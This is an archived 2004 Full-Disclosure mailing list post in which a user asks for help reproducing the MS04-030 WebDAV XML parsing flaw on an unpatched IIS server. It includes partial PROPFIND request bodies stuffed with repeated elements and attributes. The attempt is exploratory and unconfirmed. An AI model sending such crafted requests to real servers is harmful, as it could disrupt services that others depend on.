Re: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details

From: nirvana (karmic_nirvana_at_yahoo.com)
Date: 10/13/04

  • Next message: steven: "[Full-Disclosure] Multiple Cross Site Scripting Vulnerabilities in FuseTalk"
    To: full-disclosure@lists.netsys.com
    Date: Wed, 13 Oct 2004 10:51:59 -0700 (PDT)
    
    

    I tried attributes in a single tag too, like...

    <x:elem x:attr="value" x:attr="value" x:attr="value"
    x:attr="value" x:attr="value"...........so on />

    --- nirvana <karmic_nirvana@yahoo.com> wrote:

    > Hi List,
    > I've been trying to reproduce this vulnerability
    > (MS04-030) on my unpatched IIS. I am sending a
    > request
    > with a element which has multiple/many attributes.
    > With my limited knowlegde of WebDAV, I think the
    > attributes per-element can be sent in two ways
    > 1.in one line, in the element tag only
    > 2.in multiple per attribute tags.
    >
    > The request I am sending is something like this (XML
    > Data only from a PROPFIND Request, with multiple
    > tags)...
    >
    > <?xml version="1.0" encoding="utf-8" ?>
    > <D:propfind xmlns:D="DAV:">
    > <D:prop xmlns:ns="DAV:"><ns:displayname/>
    > <ns:displayname>
    > <attrib1>a</attrib1>
    > <attrib1>a</attrib1>
    > .
    > .
    > .
    > .
    > <attrib1>a</attrib1>
    > </ns:displayname>
    > </D:prop>
    > </D:propfind>
    >
    >
    >
    > Plz feel free to rant me if I doin wrong :).
    >
    > Thanks.
    >
    >
    >
    >
    >
    >
    >
    > __________________________________
    > Do you Yahoo!?
    > Read only the mail you want - Yahoo! Mail SpamGuard.
    > http://promotions.yahoo.com/new_mail
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter:
    > http://lists.netsys.com/full-disclosure-charter.html
    >

    __________________________________________________
    Do You Yahoo!?
    Tired of spam? Yahoo! Mail has the best spam protection around
    http://mail.yahoo.com

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: steven: "[Full-Disclosure] Multiple Cross Site Scripting Vulnerabilities in FuseTalk"